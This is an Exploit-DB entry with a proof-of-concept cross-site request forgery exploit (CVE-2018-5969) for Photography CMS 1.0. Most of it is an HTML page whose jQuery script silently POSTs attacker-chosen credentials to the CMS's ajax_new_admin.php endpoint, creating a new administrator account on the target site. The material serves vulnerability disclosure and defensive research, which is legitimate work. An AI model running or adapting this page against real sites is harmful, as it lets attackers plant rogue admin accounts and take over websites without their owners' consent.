Photography CMS 1.0 - Cross-Site Request Forgery (Add Admin)

EDB-ID:

43867




Platform:

PHP

Date:

2018-01-23


<!--
# # # # # 
# Exploit Title: Photography CMS 1.0 - Cross-Site Request Forgery (Add Admin)
# Dork: N/A
# Date: 23.01.2018
# Vendor Homepage: http://ronnieswietek.com/
# Software Link: https://codecanyon.net/item/client-photo-studio-photography-cms/1191688
# Version: 1.0
# Category: Webapps
# Tested on: WiN7_x64/KaLiLinuX_x64
# CVE: CVE-2018-5969
# # # # #
# Exploit Author: Ihsan Sencan
# Author Web: http://ihsan.net
# Author Social: @ihsansencan
# # # # #
# 
# Proof of Concept:
# 1)
-->
<html>
<body>
<script src="http://code.jquery.com/jquery-1.7.1.min.js"></script>
<h2>New Admin</h2>
<div class="efe">
<form method="post" onSubmit="return false">
	<label for="username">Username:</label>
	<input id="username" type="text"><br><br>

	<label for="password1">Password:</label>
	<input id="password1" type="password"><br><br>

	<label for="password2">Confirm Password:</label>
	<input id="password2" type="password"><br><br>

	<label for="email">Email:</label>
	<input id="email" type="text"><br><br>

	<input id="ekleabi" value="Ver Ayari" type="submit">
</form>
</div>
<script type="text/javascript">
	$("#ekleabi").live('click',function()
	{
		$.ajax({
			type: "POST",
			url: "http://ronnieswietek.com/cc/clients/resources/ajax/ajax_new_admin.php",
			data:{
				username:$(".efe #username").val(),
				password1:$(".efe #password1").val(),
				password2:$(".efe #password2").val(),
				email:$(".efe #email").val()
			}
		});
	});
</script>
</body>
</html>